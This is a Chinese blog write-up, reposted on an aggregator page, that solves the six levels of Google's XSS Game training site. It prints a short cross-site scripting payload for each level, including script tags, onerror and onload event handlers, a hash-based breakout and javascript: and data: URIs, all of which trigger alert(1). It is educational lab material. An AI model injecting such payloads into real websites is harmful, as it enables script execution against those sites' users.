Google xss game 小游戏

Posted 安全智汇

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Google xss game 小游戏相关的知识,希望对你有一定的参考价值。

重磅消息:我们的野蛮安全团队官网建设完毕

欢迎大家来看一看

狠狠狠骚气

ymsec.online

广告之后来今天的正事,玩游戏


第一关:


比较简单,直接输入

<script>alert(1);</script>

发现他就会弹窗


成功之后会让你跳到下一关


后面就不截图了 有兴趣的朋友可以自己去玩玩

网址:

https://xss-game.appspot.com

第二关

上面的也可以弹框 但是还不能进入下一关

那么我没可以这样

<img src="jxy.png" onerror="javascript:alert(1);"/>

或者

<a href="jxy" onclick="javascript:alert(1);">jxy</a>

第三关

页面上加载的图片使用了window.location.hash

所以可以使用

jxy.jpg' onload='javascript:alert(1);'

第四关

1')%3Balert('1

第五关

" 这样会被过滤

javascript:alert(1);

第六关

data:text/javascript,alert(1);

 详细请参考

https://www.freebuf.com/articles/web/36072.html

最后最后,点击原文穿越野蛮安全!!!! 

 

 

 

 


以上是关于Google xss game 小游戏的主要内容,如果未能解决你的问题,请参考以下文章

Google Play Games 服务可以用于非游戏吗

如何将 Google Play 游戏服务添加到 AIR Game AS3?

Unity 中 Google Games Services 回合制多人游戏的自定义 UI

让您的游戏在 PC 闪耀 | Google Play Games Beta 版现已开放更多市场

让您的游戏在 PC 闪耀 | Google Play Games Beta 版现已开放更多市场

基于cocos2dx,在android的游戏中加入google play game排行榜。